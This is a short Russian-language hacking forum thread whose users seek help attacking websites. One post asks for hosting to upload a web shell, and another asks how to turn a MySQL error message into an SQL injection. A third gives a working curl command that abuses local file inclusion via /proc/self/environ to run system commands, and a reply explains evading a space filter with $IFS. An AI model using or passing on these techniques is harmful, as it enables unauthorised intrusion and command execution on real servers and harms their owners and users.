парни вот я коечто получил из сайта скажите что из этого можно извлечь? файл прикреплен

Люди а мне никто не поможет????:em14:

Привет, всем я тут новичек. Вот я пишу сам сайты на PHP.
Движки не очень люблю юзать. Всегда пишу сам. и только вчера написал движок с использованием инклюд для облегчения работы, и нашел на этом сайте почти полную копию моего уязвимого инклюда =) Помогите как избежать этого.

code:

подскажите пожалуйста какой-нибудь хостинг чтоб shell залить(кроме народа а то он чё то не пашет)

В инклуде далеко не лучшее место для динамически подставляемых переменных.

t0xA, у меня имееться ссылка вида http://site.com/test.php и при переходе на неё выходит ошибка: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/baza/data/www/site.com/test.php on line 5 . Я знаю много сайтов с подобными ошибками и но как иньекцию произвести незнаю подскажи что делать. И ещё вопрос для чего раскрытие пути нужно?

юзаю lfi, выполняю запрос -

Цитата:


curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=system(ls);" -h "user-agent: " > info.html



всё работает на ура! выполняю запрос -

Цитата:


curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=system(ls -la);" -h "user-agent: " > info.html



не проходит..... скорей всего дело в пробеле...как это обойти? кто поможет, плюс в репу обеспечен!

Скрипт фильтрует пробел.... Попробуй замени символ пробела на $IFS

:glass: всмысле, ошибка?